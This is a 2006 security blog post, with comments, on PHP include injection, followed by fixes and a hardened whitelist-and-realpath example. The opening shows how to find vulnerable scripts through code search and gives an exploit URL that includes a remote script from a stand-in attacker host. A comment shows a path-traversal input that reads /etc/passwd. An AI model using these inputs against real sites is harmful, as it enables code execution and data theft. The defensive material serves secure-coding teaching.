How to scan for basic PHP include injection / How to prevent this kind of injection?
By Romain Friday, October 27 2006 - 23:30 UTC - Vulnerabilities - Permalink
Here we go.
Once you have this access you can do whatever you want: install a rootkit, look at the database, etc.
Follow the instructions below...
Thanks to Google Code Search, you can look for a basic PHP include that takes a GET/POST value. Mine the results until you find something interesting...
Basically, what you've found is:
<?php /* ... */ include( $_GET['myFile'] ); ?>
Just give the script what it wants: http://.../blah.php?myFile=http://bad.server.com/myScriptPHP.txt
The easiest fix is to prepend an absolute path, such as:
<?php /* ... */ include( '/home/foo/www/docs/' . $_GET['myFile'] ); ?>
Then, to be sure the file is okay, only allow files from your own document tree to be opened:
<?php
/* ... */
// Prepend the absolute docs directory, then fall back to the 404 page
// when the requested file does not exist.
$myFile = '/home/foo/www/docs/' . $_GET['myFile'];
if (!file_exists($myFile)) {
    $myFile = '/home/foo/www/error/404.html';
}
include( $myFile );
?>
Another way to do it is the following:
<?php
/* ... */
// Whitelist: only the three known page names are ever passed to include().
$myFile = htmlentities($_GET['myFile']);
switch ($myFile) {
    case 'menu':
    case 'blog':
    case 'cv':
        break;
    default:
        $myFile = 'error';
        break;
}
include( $myFile );
?>
Comments
The 1st way is still exploitable in a way.
Instead of:
www.mywebsite.com/index.php?page=myfile.html
if I type:
www.mywebsite.com/index.php?page=../../../../etc/passwd
I will retrieve your passwd file or any other file I can think of.
Read the following blog post for details:
www.0x000000.com/index.php?i=315
----------------
Better use the second way,
cheers
Wahou, I didn't even remember this post. Anyway, you're absolutely right; a solution is to prevent path traversal for instance and also special character injection such as NULL bytes, etc.
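Putting the post's whitelist together with the path-traversal and NULL-byte points raised in the comments, here is an added example (not the post's or the commenters' code). It assumes the pages live as menu.php, blog.php and cv.php under the docs directory named in the post, with an error.php beside them.

```php
<?php
// Added example, not the post's or the commenters' code. It combines the post's
// whitelist (menu/blog/cv) with a realpath() containment check, so that the
// traversal ("../../etc/passwd") and NULL-byte inputs mentioned in the comments
// never reach include(). The docs directory and $_GET['myFile'] are the post's names.

const ALLOWED_PAGES = ['menu', 'blog', 'cv'];
const DOCS_DIR = '/home/foo/www/docs';

/**
 * Map a user-supplied page name to a file inside DOCS_DIR.
 * Anything unacceptable resolves to the error page instead.
 */
function resolvePage(string $requested, string $docsDir = DOCS_DIR): string
{
    $errorPage = $docsDir . '/error.php';

    // 1. Shape check: a short bare name only. This rejects "/", "..", "\0",
    //    and remote URLs such as "http://bad.server.com/myScriptPHP.txt".
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return $errorPage;
    }

    // 2. Whitelist check: the post's switch/case as a strict array lookup.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return $errorPage;
    }

    // 3. Containment check (defence in depth): realpath() resolves symlinks
    //    and "..", so the final path must still sit below the docs directory.
    $candidate = realpath($docsDir . '/' . $requested . '.php');
    $base      = realpath($docsDir);
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $errorPage;
    }
    return $candidate;
}

// A non-string (e.g. myFile[]=x) or missing parameter fails the shape check.
$requested = $_GET['myFile'] ?? 'menu';
include resolvePage(is_string($requested) ? $requested : '');
```

With allow_url_include left at its default of Off, step 1 is what stops the remote include shown in the post; steps 2 and 3 catch everything the first comment describes.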